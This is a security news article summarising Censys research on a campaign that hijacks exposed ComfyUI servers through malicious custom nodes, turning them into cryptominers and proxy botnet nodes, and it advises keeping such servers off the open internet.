ComfyUI servers: Attackers turn instances into a cryptominer proxy botnet

IT researchers are observing a wave of attacks in which malicious actors are incorporating ComfyUI servers into a botnet. In this botnet, the compromised instances serve as cryptominers and proxy servers.

This is reported by IT security researchers from Censys in a blog post. The observed attack wave began on March 12, 2026. At that time, Censys systems discovered a rapidly filling directory at a bulletproof hoster, where attackers were apparently collecting data from internet scans. The investigation led to the realization that the perpetrators are targeting ComfyUI instances that are openly accessible on the internet – the Censys researchers have identified more than a thousand such installations online. The attackers are attempting to exploit the custom node ecosystem to achieve malware distribution without prior authentication. "Custom Nodes" refers to the installation of custom modules in ComfyUI, which is apparently possible without login in case of misconfiguration.

A scanner programmed in the Python scripting language scans large IP ranges for vulnerable targets and automatically installs malicious nodes via the ComfyUI manager, provided it has not already found a node that can be exploited. Attackers centrally control compromised servers via a Flask-based command-and-control dashboard. The instances ultimately mine Monero using XMRig and Conflux using lolMiner. Furthermore, they are part of a "Hysteria v2" botnet.

Anchored Malware

As the analysts further report, the anchored malware is sophisticated. It attempts to evade detection by running without dropped files and masks the kernel thread process. It also anchors itself as an LD_PRELOAD rootkit. In this process, attackers overwrite existing functions of dynamically linked programs. Additionally, the "ghost.sh" malware knows three independent "revival mechanisms" that survive the removal of the cryptominer component and system restarts.

The Python scanner even receives updates. IT researchers report that version 8.2 of it has received two new re-infection mechanisms. One disguises itself as a "GPU Performance Monitor" node and re-downloads the malicious code every six hours. The second, however, conceals itself as a startup workflow that is poisoned with the malware.

Interested parties can find more detailed information in the analysis. At the end, the Censys employees also list several indicators of compromise (IOCs) that ComfyUI administrators can use to check if they have become a target in the current attack wave.

ComfyUI is an open-source and popular toolkit for locally creating AI images and videos. It can serve as an alternative to the easier-to-use Amuse, for example. However, for security reasons, servers should ideally only be accessible within the LAN or via VPN and not be exposed directly to the internet.

(dmk)